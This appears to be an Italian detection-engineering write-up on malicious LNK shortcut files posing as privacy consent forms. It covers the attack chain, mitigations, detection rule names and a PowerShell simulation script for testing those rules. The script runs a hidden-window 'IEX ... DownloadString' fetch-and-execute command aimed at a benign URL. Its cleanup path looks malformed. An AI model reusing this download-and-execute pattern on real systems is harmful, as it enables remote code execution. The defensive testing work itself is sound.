Cosa C’era Davvero all’Interno del File di Scorciatoia Mascherato da Modulo di Consenso alla Privacy?
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Gli attori della minaccia stanno distribuendo file LNK dannosi mascherati da moduli di consenso sulla privacy per ingannare gli utenti facendoli aprire. Quando eseguiti, questi file di scorciatoia lanciano comandi PowerShell offuscati che recuperano ed eseguono ulteriori payload utilizzando tecniche senza file. La catena di attacco è progettata per rubare informazioni e distribuire un caricatore di backdoor che aiuta a preservare l’accesso e la persistenza.
Indagine
L’indagine ha mostrato che i file LNK incorporano codice PowerShell offuscato responsabile del download di script successivi. Questi script secondari includono un downloader che preleva payload da servizi web legittimi e un caricatore che li esegue direttamente in memoria. L’attore della minaccia abusa anche del Task Scheduler di Windows per la persistenza e utilizza documenti esca per far apparire legittima l’attività dannosa.
Mitigazione
Le organizzazioni dovrebbero imporre una verifica rigorosa delle estensioni dei file e avvertire gli utenti sui file LNK mascherati da documenti regolari. I team di sicurezza dovrebbero monitorare da vicino l’attività del Task Scheduler, i log di esecuzione di PowerShell e le connessioni di rete in uscita. Gli utenti dovrebbero anche essere addestrati a convalidare sia il mittente sia il percorso di consegna di qualsiasi file in arrivo prima di aprirlo.
Risposta
Se viene rilevata quest’attività, gli amministratori dovrebbero immediatamente esaminare le voci sospette nel Task Scheduler e la creazione di script PowerShell insoliti nelle directory accessibili agli utenti. I log di PowerShell dovrebbero essere analizzati e le connessioni esterne tracciate, specialmente quelle che coinvolgono piattaforme cloud legittime o servizi di archiviazione web. Dovrebbe poi essere eseguita un’indagine forense completa su qualsiasi script dannoso identificato e sul traffico di rete non autorizzato.
Flusso di Attacco
Rilevamenti
Possibile scoperta di informazioni di sistema utilizzando il modulo Wmi PowerShell (via PowerShell)
Visualizza
Possibili indicatori di offuscamento PowerShell (via PowerShell)
Visualizza
Esecuzione di file LNK dannosi portando al download esterno e alle connessioni [Connessione di Rete di Windows]
Visualizza
Esecuzione di file LNK dannosi e persistenza tramite Task Scheduler [Creazione Processo Windows]
Visualizza
Esecuzione di file LNK dannosi eseguendo PowerShell offuscato [Windows PowerShell]
Visualizza
Esecuzione Simulazione
Prerequisito: il controllo di pre-volo Telemetria e Baseline deve essere passato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrativa & Comandi di Attacco: L’avversario cerca di stabilire l’accesso iniziale e scaricare un payload di malware di secondo stadio. Per evitare il rilevamento da parte di scanner di file semplici, utilizzano un file LNK (scorciatoia). Questo file LNK è progettato per eseguire
powershell.exein una finestra nascosta. Il comando passato a PowerShell utilizzaInvoke-ExpressionandDownloadStringper ottenere uno script da un URL remoto. Questo imita attacchi “Living-off-the-Land” (LotL) del mondo reale dove binari legittimi vengono utilizzati per eseguire azioni dannose, cercando di bypassare gli antivirus tradizionali basati su firme. -
Script di Test di Regressione:
# 1. Definire l'URL di destinazione (utilizzando un sito benigno per il test) $url = "https://www.google.com" # 2. Creare la stringa payload di PowerShell dannosa # Questa stringa è progettata per attivare il rilevamento 'DownloadString' e 'Invoke-Expression' $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')" # 3. Creare un contenuto di file LNK falso (Simulato) # In un attacco reale, questo sarebbe un file .lnk binario. # Qui eseguiamo il comando direttamente per garantire che il log dello ScriptBlock sia generato per la convalida. Write-Host "[+] Simulazione dell'esecuzione PowerShell dannosa tramite payload LNK..." powershell.exe -WindowStyle Hidden -Command $payload Write-Host "[+] Comando di simulazione eseguito. Controlla l'ID evento 4104." -
Comandi di Pulizia:
# Rimuovere eventuali artefatti se i file sono stati creati Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue Write-Host "[+] Pulizia completata."